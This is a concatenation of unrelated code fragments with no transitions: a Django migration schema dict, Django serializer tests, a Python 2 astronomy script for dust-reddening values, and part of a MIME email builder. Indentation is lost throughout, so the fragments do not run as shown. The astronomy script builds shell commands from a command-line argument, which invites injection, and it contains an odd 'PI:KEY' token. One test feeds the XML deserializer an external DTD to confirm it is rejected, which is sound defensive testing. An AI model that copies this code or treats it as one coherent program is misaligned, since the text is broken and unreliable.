'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""})
},
'canvas.remixplugin': {
'Meta': {'object_name': 'RemixPlugin'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.stashcontent': {
'Meta': {'object_name': 'StashContent'},
'content': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']"", 'null': 'True'}),
'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invite_bypass': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '255', 'blank': 'True'}),
'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']"", 'null': 'True'}),
'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}),
'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True'})
},
'canvas.usermoderationlog': {
'Meta': {'object_name': 'UserModerationLog'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderation_log'"", 'to': ""orm['auth.User']""})
},
'canvas.userwarning': {
'Meta': {'object_name': 'UserWarning'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}),
'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'custom_message': ('django.db.models.fields.TextField', [], {}),
'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('canvas.util.UnixTimestampField', [], {}),
'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'user_warnings'"", 'to': ""orm['auth.User']""}),
'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.welcomeemailrecipient': {
'Meta': {'object_name': 'WelcomeEmailRecipient'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': ""('name',)"", 'unique_together': ""(('app_label', 'model'),)"", 'object_name': 'ContentType', 'db_table': ""'django_content_type'""},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
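# For context: the frozen ``models`` dict above is the schema snapshot format
# used by South-style Django migrations. A minimal sketch of the wrapper such
# a dict normally sits in, assuming South's SchemaMigration API (the method
# bodies are illustrative placeholders, not the original migration's code):
#
# from south.v2 import SchemaMigration
#
# class Migration(SchemaMigration):
#     def forwards(self, orm):
#         pass  # apply the schema changes, e.g. db.create_table(...)
#     def backwards(self, orm):
#         pass  # reverse them
#     models = {...}  # the frozen dict shown above
#     complete_apps = ['canvas']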
complete_apps = ['canvas']
"""
A test spanning all the capabilities of all the serializers.
This class defines sample data and a dynamically generated
test case that is capable of testing the capabilities of
the serializers. This includes all valid data values, plus
forward, backwards and self references.
""""""
from __future__ import unicode_literals
import datetime
import decimal
from unittest import expectedFailure, skipUnless
try:
import yaml
except ImportError:
yaml = None
from django.core import serializers
from django.core.serializers import SerializerDoesNotExist
from django.core.serializers.base import DeserializationError
from django.core.serializers.xml_serializer import DTDForbidden
from django.db import connection, models
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from django.utils.encoding import force_text
from django.utils.functional import curry
from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,
FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,
GenericIPAddressData, NullBooleanData, PositiveIntegerData,
PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,
GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,
FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,
Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,
DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,
GenericIPAddressPKData, PositiveIntegerPKData,
PositiveSmallIntegerPKData, SlugPKData, SmallPKData,
AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,
ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,
ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,
NaturalKeyAnchor, FKDataNaturalKey)
# A set of functions that can be used to recreate
# test data objects of various kinds.
# The save method is a raw base model save, to make
# sure that the data in the database matches the
# exact test case.
def data_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def generic_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data[0]
models.Model.save_base(instance, raw=True)
for tag in data[1:]:
instance.tags.create(data=tag)
return [instance]
def fk_create(pk, klass, data):
instance = klass(id=pk)
setattr(instance, 'data_id', data)
models.Model.save_base(instance, raw=True)
return [instance]
def m2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
instance.data = data
return [instance]
def im2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
return [instance]
def im_create(pk, klass, data):
instance = klass(id=pk)
instance.right_id = data['right']
instance.left_id = data['left']
if 'extra' in data:
instance.extra = data['extra']
models.Model.save_base(instance, raw=True)
return [instance]
def o2o_create(pk, klass, data):
instance = klass()
instance.data_id = data
models.Model.save_base(instance, raw=True)
return [instance]
def pk_create(pk, klass, data):
instance = klass()
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def inherited_create(pk, klass, data):
instance = klass(id=pk,**data)
# This isn't a raw save because:
# 1) we're testing inheritance, not field behavior, so none
# of the field values need to be protected.
# 2) saving the child class and having the parent created
# automatically is easier than manually creating both.
models.Model.save(instance)
created = [instance]
for klass,field in instance._meta.parents.items():
created.append(klass.objects.get(id=pk))
return created
# A set of functions that can be used to compare
# test data objects of various kinds
def data_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
if klass == BinaryData and data is not None:
testcase.assertEqual(bytes(data), bytes(instance.data),
""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % (
pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),
type(instance.data))
)
else:
testcase.assertEqual(data, instance.data,
""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % (
pk, data, type(data), instance, type(instance.data))
)
def generic_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data[0], instance.data)
testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')])
def fk_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, instance.data_id)
def m2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')])
def im2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
# nothing else to check; the instance just needs to exist
def im_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data['left'], instance.left_id)
testcase.assertEqual(data['right'], instance.right_id)
if 'extra' in data:
testcase.assertEqual(data['extra'], instance.extra)
else:
testcase.assertEqual(""doesn't matter"", instance.extra)
def o2o_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data_id)
def pk_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data)
def inherited_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
for key,value in data.items():
testcase.assertEqual(value, getattr(instance,key))
# Define some data types. Each data type is
# actually a pair of functions; one to create
# and one to compare objects of that type
data_obj = (data_create, data_compare)
generic_obj = (generic_create, generic_compare)
fk_obj = (fk_create, fk_compare)
m2m_obj = (m2m_create, m2m_compare)
im2m_obj = (im2m_create, im2m_compare)
im_obj = (im_create, im_compare)
o2o_obj = (o2o_create, o2o_compare)
pk_obj = (pk_create, pk_compare)
inherited_obj = (inherited_create, inherited_compare)
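# Illustration of how one test_data row below drives a round trip, mirroring
# the creator/comparator calling convention that serializerTest uses further
# down (the concrete values here are hypothetical):
#
# create, compare = data_obj
# create(10, CharData, "Test Char Data")            # raw-save an instance
# compare(testcase, 10, CharData, "Test Char Data") # re-read it and assert equality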
test_data = [
# Format: (data type, PK value, Model Class, data)
(data_obj, 1, BinaryData, six.memoryview(b"\x05\xFD\x00")),
(data_obj, 2, BinaryData, None),
(data_obj, 5, BooleanData, True),
(data_obj, 6, BooleanData, False),
(data_obj, 10, CharData, "Test Char Data"),
(data_obj, 11, CharData, ""),
(data_obj, 12, CharData, "None"),
(data_obj, 13, CharData, "null"),
(data_obj, 14, CharData, "NULL"),
(data_obj, 15, CharData, None),
# (We use something that will fit into a latin1 database encoding here,
# because that is still the default used on many system setups.)
(data_obj, 16, CharData, '\xa5'),
(data_obj, 20, DateData, datetime.date(2006,6,16)),
(data_obj, 21, DateData, None),
(data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 31, DateTimeData, None),
(data_obj, 40, EmailData, "dummy@email.com"),
(data_obj, 41, EmailData, None),
(data_obj, 42, EmailData, ""),
(data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'),
# (data_obj, 51, FileData, None),
(data_obj, 52, FileData, ""),
(data_obj, 60, FilePathData, "/foo/bar/whiz.txt"),
(data_obj, 61, FilePathData, None),
(data_obj, 62, FilePathData, ""),
(data_obj, 70, DecimalData, decimal.Decimal('12.345')),
(data_obj, 71, DecimalData, decimal.Decimal('-12.345')),
(data_obj, 72, DecimalData, decimal.Decimal('0.0')),
(data_obj, 73, DecimalData, None),
(data_obj, 74, FloatData, 12.345),
(data_obj, 75, FloatData, -12.345),
(data_obj, 76, FloatData, 0.0),
(data_obj, 77, FloatData, None),
(data_obj, 80, IntegerData, 123456789),
(data_obj, 81, IntegerData, -123456789),
(data_obj, 82, IntegerData, 0),
(data_obj, 83, IntegerData, None),
#(XX, ImageData
(data_obj, 90, IPAddressData, "127.0.0.1"),
(data_obj, 91, IPAddressData, None),
(data_obj, 95, GenericIPAddressData, "127.0.0.1"),
(data_obj, 96, GenericIPAddressData, None),
(data_obj, 100, NullBooleanData, True),
(data_obj, 101, NullBooleanData, False),
(data_obj, 102, NullBooleanData, None),
(data_obj, 120, PositiveIntegerData, 123456789),
(data_obj, 121, PositiveIntegerData, None),
(data_obj, 130, PositiveSmallIntegerData, 12),
(data_obj, 131, PositiveSmallIntegerData, None),
(data_obj, 140, SlugData, "this-is-a-slug"),
(data_obj, 141, SlugData, None),
(data_obj, 142, SlugData, ""),
(data_obj, 150, SmallData, 12),
(data_obj, 151, SmallData, -12),
(data_obj, 152, SmallData, 0),
(data_obj, 153, SmallData, None),
(data_obj, 160, TextData, """This is a long piece of text.
It contains line breaks.
Several of them.
The end."""),
(data_obj, 161, TextData, ""),
(data_obj, 162, TextData, None),
(data_obj, 170, TimeData, datetime.time(10,42,37)),
(data_obj, 171, TimeData, None),
(generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']),
(generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']),
(data_obj, 300, Anchor, "Anchor 1"),
(data_obj, 301, Anchor, "Anchor 2"),
(data_obj, 302, UniqueAnchor, "UAnchor 1"),
(fk_obj, 400, FKData, 300), # Post reference
(fk_obj, 401, FKData, 500), # Pre reference
(fk_obj, 402, FKData, None), # Empty reference
(m2m_obj, 410, M2MData, []), # Empty set
(m2m_obj, 411, M2MData, [300,301]), # Post reference
(m2m_obj, 412, M2MData, [500,501]), # Pre reference
(m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference
(o2o_obj, None, O2OData, 300), # Post reference
(o2o_obj, None, O2OData, 500), # Pre reference
(fk_obj, 430, FKSelfData, 431), # Pre reference
(fk_obj, 431, FKSelfData, 430), # Post reference
(fk_obj, 432, FKSelfData, None), # Empty reference
(m2m_obj, 440, M2MSelfData, []),
(m2m_obj, 441, M2MSelfData, []),
(m2m_obj, 442, M2MSelfData, [440, 441]),
(m2m_obj, 443, M2MSelfData, [445, 446]),
(m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),
(m2m_obj, 445, M2MSelfData, []),
(m2m_obj, 446, M2MSelfData, []),
(fk_obj, 450, FKDataToField, "UAnchor 1"),
(fk_obj, 451, FKDataToField, "UAnchor 2"),
(fk_obj, 452, FKDataToField, None),
(fk_obj, 460, FKDataToO2O, 300),
(im2m_obj, 470, M2MIntermediateData, None),
# testing post- and pre-references and extra fields
(im_obj, 480, Intermediate, {'right': 300, 'left': 470}),
(im_obj, 481, Intermediate, {'right': 300, 'left': 490}),
(im_obj, 482, Intermediate, {'right': 500, 'left': 470}),
(im_obj, 483, Intermediate, {'right': 500, 'left': 490}),
(im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': "extra"}),
(im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': "extra"}),
(im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': "extra"}),
(im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': "extra"}),
(im2m_obj, 490, M2MIntermediateData, []),
(data_obj, 500, Anchor, "Anchor 3"),
(data_obj, 501, Anchor, "Anchor 4"),
(data_obj, 502, UniqueAnchor, "UAnchor 2"),
(pk_obj, 601, BooleanPKData, True),
(pk_obj, 602, BooleanPKData, False),
(pk_obj, 610, CharPKData, "Test Char PKData"),
# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),
# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),
(pk_obj, 640, EmailPKData, "dummy@email.com"),
# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'),
(pk_obj, 660, FilePathPKData, "/foo/bar/whiz.txt"),
(pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')),
(pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')),
(pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')),
(pk_obj, 673, FloatPKData, 12.345),
(pk_obj, 674, FloatPKData, -12.345),
(pk_obj, 675, FloatPKData, 0.0),
(pk_obj, 680, IntegerPKData, 123456789),
(pk_obj, 681, IntegerPKData, -123456789),
(pk_obj, 682, IntegerPKData, 0),
# (XX, ImagePKData
(pk_obj, 690, IPAddressPKData, "127.0.0.1"),
(pk_obj, 695, GenericIPAddressPKData, "127.0.0.1"),
# (pk_obj, 700, NullBooleanPKData, True),
# (pk_obj, 701, NullBooleanPKData, False),
(pk_obj, 720, PositiveIntegerPKData, 123456789),
(pk_obj, 730, PositiveSmallIntegerPKData, 12),
(pk_obj, 740, SlugPKData, "this-is-a-slug"),
(pk_obj, 750, SmallPKData, 12),
(pk_obj, 751, SmallPKData, -12),
(pk_obj, 752, SmallPKData, 0),
# (pk_obj, 760, TextPKData, """This is a long piece of text.
# It contains line breaks.
# Several of them.
# The end."""),
# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),
# (pk_obj, 790, XMLPKData, "<foo></foo>"),
(data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 810, ModifyingSaveData, 42),
(inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}),
(data_obj, 1000, BigIntegerData, 9223372036854775807),
(data_obj, 1001, BigIntegerData, -9223372036854775808),
(data_obj, 1002, BigIntegerData, 0),
(data_obj, 1003, BigIntegerData, None),
(data_obj, 1004, LengthModel, 0),
(data_obj, 1005, LengthModel, 1),
]
natural_key_test_data = [
(data_obj, 1100, NaturalKeyAnchor, "Natural Key Anghor"),
(fk_obj, 1101, FKDataNaturalKey, 1100),
(fk_obj, 1102, FKDataNaturalKey, None),
]
# Because Oracle treats the empty string as NULL, Oracle is expected to fail
# when field.empty_strings_allowed is True and the value is None; skip these
# tests.
if connection.features.interprets_empty_strings_as_nulls:
test_data = [data for data in test_data
if not (data[0] == data_obj and
data[2]._meta.get_field('data').empty_strings_allowed and
data[3] is None)]
# Regression test for #8651 -- a FK to an object with PK of 0.
# This won't work on MySQL since it won't let you create an object
# with a primary key of 0.
if connection.features.allows_primary_key_0:
test_data.extend([
(data_obj, 0, Anchor, ""Anchor 0""),
(fk_obj, 465, FKData, 0),
])
# Dynamically create serializer tests to ensure that all
# registered serializers are automatically tested.
class SerializerTests(TestCase):
def test_get_unknown_serializer(self):
""""""
#15889: get_serializer('nonsense') raises a SerializerDoesNotExist
""""""
with self.assertRaises(SerializerDoesNotExist):
serializers.get_serializer(""nonsense"")
with self.assertRaises(KeyError):
serializers.get_serializer(""nonsense"")
# SerializerDoesNotExist is instantiated with the nonexistent format
with self.assertRaises(SerializerDoesNotExist) as cm:
serializers.get_serializer(""nonsense"")
self.assertEqual(cm.exception.args, (""nonsense"",))
def test_unregister_unknown_serializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.unregister_serializer("nonsense")
def test_get_unknown_deserializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.get_deserializer("nonsense")
def test_json_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""):
pass
@skipUnless(yaml, "PyYAML not installed")
def test_yaml_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize(""yaml"", ""{""):
pass
def test_serialize_proxy_model(self):
BaseModel.objects.create(parent_data=1)
base_objects = BaseModel.objects.all()
proxy_objects = ProxyBaseModel.objects.all()
proxy_proxy_objects = ProxyProxyBaseModel.objects.all()
base_data = serializers.serialize("json", base_objects)
proxy_data = serializers.serialize("json", proxy_objects)
proxy_proxy_data = serializers.serialize("json", proxy_proxy_objects)
self.assertEqual(base_data, proxy_data.replace('proxy', ''))
self.assertEqual(base_data, proxy_proxy_data.replace('proxy', ''))
def serializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
instance_count[klass] = 0  # register the class so its instances are counted below
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Add the generic tagged objects to the object list
objects.extend(Tag.objects.all())
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
if connection.vendor == 'mysql' and six.PY3:
# Existing MySQL DB-API drivers fail on binary data.
serializerTest = expectedFailure(serializerTest)
def naturalKeySerializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in natural_key_test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
instance_count[klass] = 0  # register the class so its instances are counted below
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2,
use_natural_keys=True)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in natural_key_test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
def fieldsTest(format, self):
obj = ComplexModel(field1='first', field2='second', field3='third')
obj.save_base(raw=True)
# Serialize then deserialize the test database
serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3'))
result = next(serializers.deserialize(format, serialized_data))
# Check that the deserialized object contains data in only the serialized fields.
self.assertEqual(result.object.field1, 'first')
self.assertEqual(result.object.field2, '')
self.assertEqual(result.object.field3, 'third')
def streamTest(format, self):
obj = ComplexModel(field1='first',field2='second',field3='third')
obj.save_base(raw=True)
# Serialize the test database to a stream
for stream in (six.StringIO(), HttpResponse()):
serializers.serialize(format, [obj], indent=2, stream=stream)
# Serialize normally for a comparison
string_data = serializers.serialize(format, [obj], indent=2)
# Check that the two are the same
if isinstance(stream, six.StringIO):
self.assertEqual(string_data, stream.getvalue())
else:
self.assertEqual(string_data, stream.content.decode('utf-8'))
for format in serializers.get_serializer_formats():
setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format))
setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format))
setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format))
if format != 'python':
setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
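# ``curry`` above is Django's partial-application helper; a sketch of the
# same dynamic test generation using only the standard library (equivalent
# in effect, assuming functools.partial semantics):
#
# import functools
# for fmt in serializers.get_serializer_formats():
#     setattr(SerializerTests, 'test_%s_serializer' % fmt,
#             functools.partial(serializerTest, fmt))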
class XmlDeserializerSecurityTests(TestCase):
def test_no_dtd(self):
""""""
The XML deserializer shouldn't allow a DTD.
This is the most straightforward way to prevent all entity definitions
and avoid both external entities and entity-expansion attacks.
""""""
xml = '<?xml version="1.0" standalone="no"?><!DOCTYPE example SYSTEM "http://example.com/example.dtd">'  # any DTD must trigger DTDForbidden
with self.assertRaises(DTDForbidden):
next(serializers.deserialize('xml', xml))
import threading
def ebv_list(list_submit,list_dict,i,ppid):
import os
lineindex = 0
timehold = time.time()
list_out = []
out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w')
for line in list_submit:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec),i)
list_out.append(EBV)
#print EBV
lineindex += 1
out.write(str(EBV) + '\n')
if lineindex % 100 == 0:
print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold
timehold = time.time()
list_dict[str(i)]['list_out'] = list_out
out.close()
def calc_EBV(coord_in_ra,coord_in_dec,i):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) )
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
class MyThread ( threading.Thread ):
def __init__ ( self, list_submit,list_dict, i, ppid):
self.i = i
self.list_submit = list_submit
self.list_dict = list_dict
self.ppid = ppid
threading.Thread.__init__(self)
def run ( self ):
ebv_list(self.list_submit, self.list_dict, self.i, self.ppid)
return
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
ppid = os.getppid()
print ppid
command = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile
print command
os.system(command)
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
number_interval = 4
length_int = len(lines)/number_interval
start = 0
my_threads = []
list_dict = {}
for i in range(number_interval):
end = start + length_int
if i + 1 == number_interval:
list_submit = lines[start:]
else:
list_submit = lines[start:end]
start = end
list_dict[str(i)] = {'list_submit':list_submit}
#s = MyThread(list_submit,list_dict,i,ppid)
#stat = os.fork()
print i, 'started'
s = os.fork()
if not s:
ebv_list(list_submit,list_dict,i,ppid)
sys.exit()
#s.start()
my_threads.append(s)
print my_threads
#print threading.enumerate()
for s in my_threads:
os.waitpid(s,0)
print 'done'
list_out = []
for i in range(number_interval):
# the forked children cannot share list_dict with the parent process,
# so collect their results from the temp files written in ebv_list
tmpf = open('/tmp/tmpf_' + str(i) + '_' + str(ppid), 'r')
list_out = list_out + [l.strip() for l in tmpf.readlines()]
tmpf.close()
print len(lines), len(list_out)
print lines[0:2], list_out[0:2]
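# A sketch of the same fan-out with the standard multiprocessing module,
# which returns results directly instead of via temp files; calc_EBV, lines
# and number_interval are the names defined above, everything else here is
# hypothetical:
#
# from multiprocessing import Pool
#
# def ebv_for_line(line):
#     tt = re.split('\s+', line)
#     return calc_EBV(float(tt[0]), float(tt[1]), 0)
#
# pool = Pool(number_interval)
# list_out = pool.map(ebv_for_line, lines)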
# READ IN COLUMN INFO
for val in list_out:
outkey.write(str(val) + '\n')
outkey.close()
command = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict['photconf'] + ""/EBV.conf -t OBJECTS ""
os.system(command)
command = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV""
os.system(command)
#coding=utf-8
import smtplib
from datetime import datetime
from hashlib import md5
import sys, re, random  # random is needed by gen_message_id below
from .misc import *
from .parts import *
from collections import OrderedDict as odict
class Mimemail():
def __init__(self, **kwargs):
self.headers = odict()
self.headers['MIME-Version'] = '1.0'
self.headers['From'] = MM_DEFAULT_FROM
self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
self.body = ''
self.html = None
self.text = None
self.images = []
self.attachments = []
self.charset = 'UTF-8'
self.recipients = {}
self.from_email = 'root@localhost'
self.kw = kwargs
def set_from(self, from_email, from_name):
self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email)
self.from_email = from_email
def set_html(self, html):
self.html = html
def set_text(self, text):
self.text = text
def add_image(self, image):
self.images.append(image)
def add_attachment(self, att):
self.attachments.append(att)
def set_subject(self, subject):
self.subject = subject
def create_images_part(self, boundary):
lines = []
for image in self.images:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
image.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
image.get_part_body()
])
return ''.join(lines)
def create_attachments_part(self, boundary):
lines = []
for att in self.attachments:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
att.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
att.get_part_body()
])
return ''.join(lines)
def build(self):
has_html = self.html != None
has_text = self.text != None
has_img = len(self.images) > 0
has_att = len(self.attachments) > 0
if has_text and not has_html:
self.html = MimemailPartHtml(re.sub(r'\n', ' ', self.text.plain_content, re.M | re.S), charset = self.charset)
elif has_html and not has_text:
self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, re.M | re.S | re.U), charset = self.charset)
elif not has_html and not has_text and not has_att:
raise MimemailException('An email has no content to send')
if has_img:
for image in self.images:
src = image.get_file_path()
dst = 'cid:' + image.get_image_cid()
self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)
boundary = 'alt_' + gen_boundary_hash()
self.headers['Content-Type'] = 'multipart/alternative; boundary="' + boundary + '"'
